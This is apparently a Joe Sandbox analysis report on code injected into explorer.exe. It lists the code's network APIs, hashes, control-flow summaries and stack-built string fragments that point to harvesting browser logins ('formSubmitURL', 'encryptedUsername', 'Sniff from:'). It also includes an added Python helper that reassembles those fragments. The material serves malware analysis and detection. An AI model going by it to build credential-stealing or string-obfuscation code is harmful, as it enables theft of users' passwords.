                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 5601A234628B884B8788EB6C94552A6B3E5FBCE314F000B3EE9DAC3240DB21D5024782

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 107D39A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: ee32a47e40e52139670f01eb9dcc73135ce9996e82b5f5ecf8c47b5029d95f2b
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: 7C31D471614B0C8BCB44EFA8D8897EEB7E5FB58205F40422AE54ED7340DF749A45C789

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 107D39A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: c716357c08ba0f8f995ad392ee32851faaaefb986bf847ef7757c02a0bbbe293
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 7421E670610B4C8BCB44EFA8D8997ED7BE5FF58205F40422AE45AE7340DF749A45C789

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: b5562736a3e98664c6c7069d26277373a44c041d92389eea99f7fa35c11f6c81
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: C5416A74918A08CFDB84EFA8C8997AD77E0FB68300F04417AD84EDB255EE309945CB85

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: 883e29fda6cbaf929a8cf7ec8f2426cf0b59e62d729d0637032533f3ece4c2b9
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: 97415974A18A0CCFDB84EFA8D499BAD77E1FB68300F04416AD84EDB255DE30A945CB85

                                            Control-flow Graph (rendered graph, nodes marked Executed / Not Executed; not reproduced here)
                                            • Function 107d572e (blocks 107d572e-107d57ab): optionally calls 107d8942 at 107d576a, then calls connect at 107d5788.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: a14b9d0a4422b859afebef8c97ab661bbb331bb6a48324b8ffce2372b803e2ae
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: 56015E30618B188FCB84EF5CE088B55B7E0FB58324F1545AEE90DCB226C674D8818BC2

                                            Control-flow Graph (rendered graph, nodes marked Executed / Not Executed; not reproduced here)
                                            • Function 107d5732 (blocks 107d5732-107d57ab, the same routine as 107d572e entered four bytes later): optionally calls 107d8942 at 107d576a, then calls connect at 107d5788.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: ad6b9ce2c72461b5d32692ed09631f136de66e4c3e688377921b8901de44b71b
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction Fuzzy Hash: 8F012170618A1C8FCB84EF5CE048B5577E0FB59314F1545AEA80DCB226C674D9818BC2

                                            Control-flow Graph (rendered graph, nodes marked Executed / Not Executed; not reproduced here)
                                            • Function 107d56b2 (blocks 107d56b2-107d572d): optionally calls 107d8942 at 107d56e7, then calls send at 107d5705.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: e6f2eff88ee244b323e725f434bc3e2530b7969cdd9b2220261938e64b20df34
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: A9011270518A188FDBC4DF5CE449B2577E0EB58314F1645AED85DCB366C670D8818B85

                                             Control-flow Graph (basic blocks and edges, flattened from the graph view)
                                             • 412: 107d55b2-107d55ea
                                             • 413: 107d55ec-107d5604 call 107d8942
                                             • 414: 107d560a-107d562b socket
                                             • Edges: 412->413, 412->414, 413->414
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: 05b81daf2063f8cb56f48f83051aacc0ca91c190a35e2231d4ebdbe3b24bac78
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: 3F017C30618B188FCB84EF5CE048B50BBE0FB59314F1545AEE84ECB326C7B0C9818B86

                                             Control-flow Graph (basic blocks and edges, flattened from the graph view)
                                             • 417: 107cd2dd-107cd320 call 107d8942
                                             • 420: 107cd3fa-107cd40e
                                             • 421: 107cd326
                                             • 422: 107cd328-107cd339 SleepEx
                                             • 423: 107cd33b-107cd341
                                             • 424: 107cd34b-107cd352
                                             • 425: 107cd343-107cd349
                                             • 426: 107cd35c-107cd36a call 107d7f12
                                             • 427: 107cd354-107cd35a
                                             • 428: 107cd370-107cd376
                                             • 429: 107cd378-107cd37e
                                             • 430: 107cd3b7-107cd3bd
                                             • 432: 107cd380-107cd38a
                                             • 433: 107cd3bf-107cd3cf call 107cde72
                                             • 434: 107cd3d4-107cd3db
                                             • 436: 107cd38c-107cd3b1 call 107ce432
                                             • 438: 107cd3e1-107cd3f5 call 107cd0f2
                                             • Edges: 417->420, 417->421, 421->422, 422->422, 422->423, 423->424, 423->425, 424->427, 424->428, 425->424, 425->426, 426->428, 427->426, 427->428, 428->429, 428->430, 429->430, 429->432, 430->433, 430->434, 432->430, 432->436, 433->434, 434->422, 434->438, 436->430, 438->422
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: 39f3c6323b17df9db76a0890d9a0cfa4e5e77adb64b8388955a3601206e7f0cb
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: 9E316BB4A14B8ADFDB94EF699188395F7A0FB54300F45467EC91DCA206CB34A850CF92

                                             Control-flow Graph (basic blocks and edges, flattened from the graph view)
                                             • 453: 107cd412-107cd446 call 107d8942
                                             • 456: 107cd448-107cd472 call 107dac9e CreateThread
                                             • 457: 107cd473-107cd47d
                                             • Edges: 453->456, 453->457
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: 638f93176407392d0a342decfd1bac8838ecdfda2fa903ec6cf4518ddae6a445
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: 4CF0F634268B494FD788EF6CD44563AF3D0FBE8215F45063EA98DC3364DA39D9818716
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 7a478578d5bad902043f5b2bfb903f20d43e882dd8f64be61fda6d69db378d18
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: EDE15A70518F488FDB64EF68C4987ABB7E1FB58300F504A2E959BC7265DF30A941CB86
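The String ID fields in the entries above (for example `.dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini`) are the fragments of strings that the injected code assembles on the stack at run time in 4-byte chunks, so the disassembler never sees `kernel32.dll` or `wininet.dll` as a whole and the report lists the chunks sorted alphabetically. The helper below is an added example for this write-up, not code from Joe Sandbox or from the sample: it takes the `$`-separated fragment list exactly as printed in the report and checks which candidate strings can be tiled from those fragments, using each fragment at most once. The candidate DLL names are an assumption chosen to match this function's fragments; `ntdll.dll` is included to show a non-match.

```python
"""
Added example (not part of the Joe Sandbox report): reassemble stack-built
strings from a "String ID" fragment list.

The sample writes strings onto the stack one DWORD at a time, so static
analysis only yields fragments such as "kern", "el32", ".dll". Given the
'$'-joined fragment list as Joe Sandbox prints it, tile() checks whether a
candidate string can be built from fragments of at most 4 bytes, and
recover() applies that to a list of candidates while consuming fragments.
"""
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Fragment list copied verbatim from the report's String ID field for the
# function in the 0E6D0000 dump that references kernel32/user32/wininet.
FRAGMENTS = ".dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini"

# Candidate strings are an assumption for this example (typical imports of
# an injected payload); ntdll.dll is deliberately not buildable here.
CANDIDATES = ["kernel32.dll", "user32.dll", "wininet.dll", "ntdll.dll"]

MAX_CHUNK = 4  # one 32-bit stack write per fragment


def parse_string_id(field: str) -> Counter:
    """Split the '$'-joined String ID value into a multiset of fragments."""
    return Counter(f for f in field.split("$") if f)


def tile(target: str, avail: Counter) -> Optional[List[str]]:
    """Return a left-to-right tiling of `target` from `avail`, or None.

    Each fragment is at most MAX_CHUNK bytes and may be used only as many
    times as it occurs in `avail`. The search backtracks, so the
    alphabetical order of fragments in the report does not matter.
    """
    def rec(pos: int, pool: Counter) -> Optional[List[str]]:
        if pos == len(target):
            return []
        for frag in list(pool):
            if pool[frag] and len(frag) <= MAX_CHUNK and target.startswith(frag, pos):
                pool[frag] -= 1
                rest = rec(pos + len(frag), pool)
                if rest is not None:
                    return [frag] + rest
                pool[frag] += 1  # undo and try the next fragment
        return None

    return rec(0, Counter(avail))


def recover(field: str, candidates: List[str]) -> Tuple[Dict[str, List[str]], Counter]:
    """Tile candidates in order, removing used fragments.

    Returns (matches, leftover): matches maps each buildable candidate to the
    fragments that form it; leftover holds fragments no candidate consumed,
    which usually point at strings not yet guessed.
    """
    pool = parse_string_id(field)
    found: Dict[str, List[str]] = {}
    for cand in candidates:
        parts = tile(cand, pool)
        if parts is not None:
            found[cand] = parts
            pool -= Counter(parts)  # Counter -= keeps only positive counts
    return found, +pool  # unary plus also drops zero counts


if __name__ == "__main__":
    matches, leftover = recover(FRAGMENTS, CANDIDATES)
    for name, parts in matches.items():
        print(f"{name:14s} <- {' + '.join(repr(p) for p in parts)}")
    print("unused fragments:", dict(leftover))
```

For this function the leftover set is `M` and `S`, single-byte writes that belong to strings whose other chunks are not in this listing; the same routine applies unchanged to the later entries such as `.dll$chro$hild$me_c` (chrome_child.dll).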
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: ca1e0ff9ddaf39888a9cc18cfff2bfbd35dbb842e4e1e9548e7db3f0279e2095
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: A8B15B30618B488EDB55EF68C489AEEB7F1FF98300F50491ED49AC7261EF709945CB86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 347ddecec62d175c789b586c8c40bbe364ff1ad466e4da0d7d6ee29ad27de902
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 3441C5B0A18B488FDF18EF88A4556AD7BF2FB48700F00025ED449D3361DB709D458BD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 7a05a87c0f659ceecf7fba7c1bafcbc626f6e3b801f992d652805c88f56313f0
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: F4C15C71218F099FCB59EF64C4996DAF3E1FB98304F404B2E959AC7220DF70A915CB86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: c063ca78c31c6dd32671c14170fd3d3f077c1e7c53bc58e4907261c52c7e921d
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: 9F51D6311187488FEB19DF18D4852AEB7E5FBC5304F50192EE8CBC7251DBB49906CB82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: d91050aa925a579b824a3c74f201550ce0e852d49796141eb8d63352514ac0d1
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: 62C1A270618A194FCB58EF68D499AEAF3E1FB98300F554769848AC7265DF30DE02CBC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: d7d59451b3fd5b9431a31ff5aeb5671e8b10195e519677d5963ffb950937ce62
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 50C1A270618A194FCB58EF68D499AAAF3E1FB98300F55476D848AC7264DF30DE01CBC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: 7e40ffa2fe269b1535310ec75b2c019314f111e9da2efc87942f90cf60bf1039
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 58A191706187488BDB19EFA8D448BEEB7E1FF88310F404A2DD48AD7251EF709945CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 6b8c3711c4262eef64a410cb94027ae9f56a47e5f03542d1d839d7474ea63c09
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 809190706187488BDB19EFA8D444BEEB7E1FF88300F404A2EE48AD7251EF709945CB85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: 3222c77cd2bfe525a8e0cf7e7392f45772825bcbc8b9cfdf98f16abb9c6be538
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: CC719431618B488FDB58EFA8C4887AAB7F1FF58304F00062ED49AC7221EB71DD458B81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 4f69ef8c2425f973c4bf96ccaa673c8f7a6629c4ce1fc0a1f6838514e1f0db65
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: 48515EB0918B4C8FDB54EFA4C044AEEB7F1FF58300F404A2E949AE7214EF3099518B89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 47013830d95fcaa280cb82097a85b326932ac6c3825a5cb7acdfb54dd8448861
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: A6415F30618B4C8BDFA5EF2498557EA77E5FB98301F414A2E989EC7250EF30D9458B82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: b94933076cf4f371d5653512c3a1dd01018cb4886e70a635f6dbbaf789bb71fa
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: EB417370A28E4D8FDF58EF58D0A87AD77E1FB58300F40456A984ED7221EA70D9809BC6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: f0d03b05a907fd5bc78372f479f091110890ab65214ae8c21ea288688ad8bc18
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 7B418270618B488FDBA9DF2880887AAB7E1FB99300F104A2E949EC3265DB70D945CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: d87b772fae008872bfb849211afe785daf325a1a122f165ef29c2b8f6d04be61
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: 7931B071509B885FDB1AEF68C4886DAB7D4FB98300F50491EE4DBD7261EA30A949CB43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 44f0ecbb036b320de0b1b4b9a96fe46f8196ea0ae03033390fe4aa6f0009f246
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: D931B271508B485FDB1ADF24C4886EAB7D5FB98300F50491EE4DBD7261EE30A945CA43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: c4b7439e42bcf091780f012177c38833dd0c31923c574216d66e7826cf0e01e5
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 1E316470218B484FCB85EF689498BAAB7E1FF98300F94496D948ECB265DF30CD45CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
